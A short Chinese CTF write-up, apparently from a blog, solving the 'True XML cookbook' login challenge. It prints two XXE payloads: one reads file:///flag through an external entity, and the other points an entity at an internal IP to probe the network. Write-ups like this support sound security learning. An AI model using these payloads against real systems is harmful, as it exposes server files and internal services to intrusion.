True XML cookbook

worker..2024-08-26 1:38

打开题目

看到登录口

随便输入admin,123456,然后抓包试一下

先按原来那道题的payload进行测试,payload和结果如下:

<?xml version="1.0" ?>

<!DOCTYPE llw [

<!ENTITY file SYSTEM "file:///flag">

]>

<user>

<username>&file;</username>

<password>1</password>

</user>

未成功获取到flag信息,试着探测内网信息,读取下系统内的配置文件信息看是否能发现有用的信息

这里获得一个新的地址,尝试下进行连接结果如下:

<?xml version="1.0" ?>

<!DOCTYPE llw [

<!ENTITY file SYSTEM "http://10.244.80.49/">

]>

<user>

<username>&file;</username>

<password>1</password>

</user>

连接失败,那就查询下同网段内存在不存在其他地址,使用bp的爆破模块进行爆破,设置如下:

扫描可得到flag

相关推荐
inxunoffice1 天前
批量将 txt/html/json/xml/csv 等文本拆分成多个文件
xml
梦幻加菲猫2 天前
XML在线格式化 - 加菲工具
xml
XiaoLeisj3 天前
【MyBatis】深入解析 MyBatis:关于注解和 XML 的 MyBatis 开发方案下字段名不一致的的查询映射解决方案
xml·java·spring boot·spring·java-ee·tomcat·mybatis
whisperrr.3 天前
【spring02】Spring 管理 Bean-IOC,基于 XML 配置 bean
xml·java·spring
Kika写代码4 天前
【Android】UI开发:XML布局与Jetpack Compose的全面对比指南
android·xml·ui
stevenzqzq4 天前
Android studio xml布局预览中 Automotive和Autotive Distant Display的区别
android·xml·android studio
兰琛4 天前
Compose组件转换XML布局
android·xml·kotlin
inxunoffice4 天前
按规则批量修改 txt/html/json/xml/csv/记事本等文本文件内容
xml·json
XiaoLeisj6 天前
【MyBatis】深入解析 MyBatis XML 开发:增删改查操作和方法命名规范、@Param 重命名参数、XML 返回自增主键方法
xml·java·数据库·spring boot·sql·intellij-idea·mybatis
chushiyunen7 天前
dom操作笔记、xml和document等
xml·java·笔记
热门推荐
01RAG 实践- Ollama+RagFlow 部署本地知识库02我决定放弃搞 Java 了03如何在WPS和Word/Excel中直接使用DeepSeek功能04空中无人机等动态目标识别2025.4.405汽车上的各种质量:整备质量、总质量、装载质量、簧上质量、簧下质量06DeepSeek各版本说明与优缺点分析07无人机等非合作目标公开数据集2025.4.308生活电子常识--删除谷歌浏览器搜索记录09从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑10DeepSeek RAGFlow构建本地知识库系统